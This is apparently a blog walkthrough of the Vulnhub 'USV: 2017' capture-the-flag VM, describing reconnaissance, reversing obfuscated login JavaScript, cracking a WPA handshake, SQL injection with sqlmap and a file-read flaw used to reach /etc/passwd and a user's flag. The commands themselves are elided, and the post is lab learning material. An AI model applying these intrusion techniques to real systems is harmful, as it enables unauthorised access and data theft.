Vulnhub: USV 2017 Boot2Root VM

Introduction

Today we’re going to be taking a look at the “USV: 2017” VM from Vulnhub! This was a super fun CTF, comprised of 5 flags in the format of country:MD5 hash.

This CTF had a bit of everything and required some nice creative problem solving to complete!

NMap

 

W0Ot, we got our first key in the SSL-cert details of the second apache installation on port 15020!

Dirb

Running Dirb on port 80 yields the following –

We’ll check out that “admin2” in a second as it looks interesting.. Running dirb on port 15020 yields –


 

Loads of treats here. Let’s have a look at the admin2 page on port 80.

Port 80

After navigating to port 80 we’re presented with a simple login form with just a password field. We try the obvious things like “admin” and “password” etc. but have no luck. Looking at the page source it appears that when submit is clicked some obfuscated Javascript fires –
…………………….

…………………….

That’s horrendous. After beautifying it and working out what it’s doing (removing the two red herrings too…) I wrote some code to perform the algorithm in reverse to make it generate a key for us.
……………………..

Which Merrily spat out “77779673” as the answer.
……………………..

Trying that password in the login form worked –

Italy:46202df2ae6c46db8efc0af148370a78

Yay!! We got out second flag! that’s Italy and France now.

Onwards!

Port 15020

Navigating to the “vault” directory found in the dirb output above yields an index file with three hundred links to directories named “door 1” to “door 300”, inside of each door are one hundred directories named “vault 1” to “vault 100”, so at this point I decided that I didn’t fancy navigating through 30,000 directories by hand! … Let’s do some Bash-fu which pulls them all down and look for obvious differences in sizes 🙂
………………………….

 

………………………….
Rockyou.zip just contains the famous password list of the same name and ctf.cap is a pcap file.
Nothing interesting jumped out of the pcap file apart from the WPA authentication handshake, so we use aircrack-ng and our handy dandy rockyou.zip to crack the password for it in case it yields additional treats.
………………………….

………………………….
30 minutes later the following pops out –
………………………..

But we don’t know what that key relates to just yet, so we’ll keep it aside for now and go take a look at the blog.

Blog

Nothing immediately interesting on the blog. There’s a HTML comment in the source code pointing to download.php, which I think can be leveraged to download arbitrary files and one of the comments on the blog mentions “I keep a flag.txt in my house”, so I think the two things will be relevant later!
There’s also an admin panel login! After prodding it a little bit I used “admin” as the username and “minion.666” as the password and it let me in!
I was a bit flummoxed here as the administrative controls don’t seem to work…? but after looking at the page source I uncovered –

Amazing. After some more URL tampering I spotted that if I mess with the ‘id’ parameter of ‘edit.php’ I can get the form to either display or not display, which implies that an SQL injection vulnerability is potentially present, so let’s chuck the URL into sqlmap and see what sticks.

………………….

………………….

Which confirms that the app is vulnerable. Now we can add some “dump” options to get all of the data out of the database and peruse it.

…………………………

………………………..

I’d normally use the same command as above with “-T users –dump” at this point to get all of the treats from the database but it wasn’t playing ball, so I went Googling to see what other options there were and apparently sqlmap supports a “sql-query” parameter to give it a custom query.

……………………….

 

………………………

That’s our fourth flag found! Notice that we execute “select * from users where id=2”, this is because “id=1” gave us back the admin user which we’ve already got credentials for.

Just one flag left to go!

So let’s go and prod that download.php some more. It was returning an error saying that the “image parameter was missing” even if I provided it like download.php?image=/etc/passwd….. so let’s try a post request with curl instead.

…………………….

…………………….

Awesome, so we’ve got a nice LFI vuln on the site now. Let’s try and find that flag.txt which was alluded to earlier!

On the blog there was a banner image with three minions “Kevin”, “Phil” and “Dave”, the /etc/passwd output shows that ‘kevin’ is a valid user on the box so let’s go and try his home directory.

……………………..

……………………..

Bingo, got our 5th and final flag!

 

Conclusion

Really, really fun challenge. Creative and challenging but without being too obscure or so overly difficult that it’s impossible for yours truly to do the challenge alone.
Many thanks to the authors and Vulnhub 🙂

Add a Comment

Your email address will not be published. Required fields are marked *